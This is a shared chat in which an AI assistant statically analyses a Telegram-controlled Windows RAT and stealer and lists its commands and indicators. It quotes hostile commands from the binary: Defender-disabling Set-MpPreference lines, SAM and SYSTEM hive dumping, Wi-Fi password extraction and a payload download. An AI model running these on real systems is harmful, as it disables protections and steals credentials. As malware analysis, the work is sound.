Find suspicious strings into it is it malware or ...
Created on: May 17, 2026
Answered using GPT-5.5 Thinking by Chat01
Question
telegram_bot.exe
Find suspicious strings into it is it malware or what and give me everything what this files can do give me all the important stuff this exe do
Thought
Answer
Verdict
Yes — this is malware with high confidence.
telegram_bot.exe is a Telegram-controlled Windows RAT / stealer. I did static analysis only and did not run it.
It contains a hard-coded Telegram bot token, connects to Telegram infrastructure, exposes remote commands, and includes features for surveillance, credential theft, persistence, AV tampering, file exfiltration, command execution, and system disruption.
File identifiers
| Item | Value |
|---|---|
| Filename | telegram_bot.exe |
| Type | PE32+ Windows x64 GUI executable |
| Size | 2,437,632 bytes |
| MD5 | 6dd2dfb10d39d0a627dfa149b53b17b4 |
| SHA1 | b9b518ad5bcc1bde9ddab9e144f3f4ec49353e7f |
| SHA256 | 42a4ae66ea99cfa32316237f457c8626b5aefe5b49b66b7fd43b205f1025e0de |
| PE timestamp | Fri May 15 04:32:46 2026 |
| Likely language | Rust |
| Notable build strings | src/main.rs, /home/kali/.cargo/registry/... |
The file appears to be a Rust-built Telegram bot using crates such as teloxide, tokio, reqwest, hyper, serde, and chrono.
Most important finding
The binary contains an embedded Telegram bot token:
8749312864:AAEZ...rwks
I redacted the middle of the token because it is effectively a live credential. Whoever controls that bot can likely issue commands to infected machines. That token should be revoked through Telegram BotFather immediately.
Command menu found inside the EXE
The malware contains this command list:
text/start /screen /clip /wifi /wifipass /keylog /stoplog /mic /history /lock /shutdown /restart /persist /disableav /sysinfo /record /myip /location /hash /gethash /upload <path> /download <url> /cmd <command>
This is a full remote-access command set.
What the EXE can do
Remote command execution
It supports:
text/cmd <command> - Execute command
Suspicious strings:
textcmd/C Command executed (no output) C:\Windows\System32\cmd.exe powershell
This means the attacker can run arbitrary Windows commands through Telegram.
Telegram command-and-control
Found strings:
texthttps://api.telegram.org GetMe GetUpdates SendMessage Bot Activated Failed to parse default Telegram bot API url
This strongly indicates the malware polls Telegram for commands and sends results back through Telegram.
Screenshot capture
Found strings:
text/screen - Take screenshot screen.png Screenshot failed
Also found PowerShell screenshot code using:
textSystem.Windows.Forms System.Drawing.Bitmap CopyFromScreen
So it can capture the victim’s screen and likely send the image back to Telegram.
Screen recording / repeated screenshots
Found strings:
text/record - Record screen (5 shots) Recording 5 screenshots... record_ .png Recording complete
This looks like it takes 5 screenshot frames, probably saved as record_*.png.
Clipboard theft
Found strings:
text/clip - Get clipboard content Get-Clipboard Clipboard: Clipboard is empty
It can read clipboard contents, which may expose passwords, crypto addresses, copied tokens, private messages, etc.
Wi-Fi profile and password theft
Found strings:
text/wifi - List WiFi networks /wifipass - Extract WiFi passwords netsh wlan show profiles netsh wlan show profile name="$profile" key=clear Key Content WiFi Passwords: No WiFi passwords found (run as admin)
It tries to enumerate saved Wi-Fi profiles and extract stored Wi-Fi passwords.
Keylogging attempt
Found strings:
text/keylog - Start keylogger /stoplog - Stop keylogger C:\keylog.txt Keylogger started. Logging to C:\keylog.txt Keylogger stopped taskkill /f /im powershell.exe 2>nul
It claims to start a keylogger and writes to:
textC:\keylog.txt
The implementation looks crude from the strings and may not be a reliable keylogger, but the intent is clearly malicious.
Browser history theft
Found strings:
text/history - Browser history C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\History Browser History: No browser history found
It tries to read Chrome browser history from user profiles.
Microphone recording attempt
Found strings:
text/mic - Record microphone (5 sec) audio.wav Microphone recording failed
It appears to try creating an audio file named:
textaudio.wav
The embedded code looks questionable, but the intended feature is microphone capture.
File exfiltration and download
Found strings:
text/upload <path> - Upload file /download <url> - Download file Invoke-WebRequest -Uri ' -OutFile C:\downloaded.exe File downloaded to C:\downloaded.exe File not found:
Capabilities:
text/upload <path>
Likely sends a chosen local file to the attacker through Telegram.
text/download <url>
Downloads attacker-supplied content to:
textC:\downloaded.exe
I did not see enough from strings alone to prove it auto-executes the downloaded file, but /cmd can be used to execute it afterward.
Persistence
Found strings:
text/persist - Add persistence Persistence added to HKCU\Run\WindowsUpdate HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
It likely adds itself to:
textHKCU\Software\Microsoft\Windows\CurrentVersion\Run
under the value name:
textWindowsUpdate
That makes it start automatically when the user logs in.
Windows Defender tampering
Found strings:
text/disableav - Disable Defender Windows Defender disabled (requires admin) Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -DisableBlockAtFirstSeen $true Set-MpPreference -DisableIOAVProtection $true Set-MpPreference -DisableArchiveScanning $true Set-MpPreference -DisableIntrusionPreventionSystem $true Set-MpPreference -DisableScriptScanning $true Set-MpPreference -SubmitSamplesConsent 2
This is very strong malware evidence. It attempts to disable multiple Microsoft Defender protections.
NTLM / Windows hash dumping
Found strings:
text/hash - Dump NTLM hashes /gethash - Get NTLM hash files NTLM hashes saved. Use /gethash to retrieve reg save HKLM\SAM C:\sam.save reg save HKLM\SYSTEM C:\system.save C:\sam.save C:\system.save No hash files found (run /hash first)
This attempts to dump Windows SAM and SYSTEM registry hives, which can be used to extract local password hashes.
This usually requires admin privileges.
System information collection
Found strings:
text/sysinfo - System information SYSTEM INFORMATION Hostname: OS: CPU: RAM: User: hostname whoami Get-CimInstance Win32_Processor Get-CimInstance Win32_ComputerSystem COMPUTERNAME USERNAME
It collects host/user/system inventory.
Public IP and geolocation lookup
Found URLs:
texthttps://api.ipify.org http://ip-api.com/json/
Found strings:
text/myip - Public IP address /location - Geolocation info Public IP: Location: City: Region: Country: Lat: Lon: ISP:
It queries external services to identify the victim’s public IP, approximate location, and ISP.
Lock, reboot, and shutdown
Found strings:
text/lock - Lock workstation /shutdown - Shutdown PC /restart - Restart PC rundll32.exe user32.dll,LockWorkStation shutdown /r /30 /c shutdown /s System restart initiated System shutdown initiated
It can disrupt the victim’s workstation.
Network indicators
texthttps://api.telegram.org https://api.ipify.org http://ip-api.com/json/
The main C2 channel appears to be Telegram Bot API.
File/path indicators
textC:\downloaded.exe C:\keylog.txt C:\sam.save C:\system.save screen.png audio.wav record_*.png
Registry persistence indicator:
textHKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Suspicious imported APIs
The import table includes capabilities consistent with process execution, networking, file access, registry access, and TLS:
textCreateProcessW CreateThread CreateFileW DeleteFileW ReadFile WriteFileEx GetEnvironmentVariableW RegOpenKeyExW RegQueryValueExW connect send recv getaddrinfo crypt32.dll certificate functions secur32.dll TLS/security functions
No obvious UPX packing was found. Entropy is moderate, so it does not look heavily packed.
Bottom line
This is not a normal Telegram bot. It is a Telegram RAT / stealer with these major capabilities:
textRemote shell Telegram C2 Screenshot capture Clipboard theft Wi-Fi password extraction Browser history theft File upload/exfiltration File download Persistence through HKCU Run Windows Defender disabling NTLM/SAM/SYSTEM hive dumping Public IP and location lookup System info collection Lock/reboot/shutdown Keylogging attempt Microphone recording attempt
Do not run it. If it already ran on a machine, assume that machine is compromised. Disconnect it from the network, revoke the Telegram bot token, check the Run key for WindowsUpdate, collect the hashes above for detection, rotate passwords, and run a full offline/EDR scan.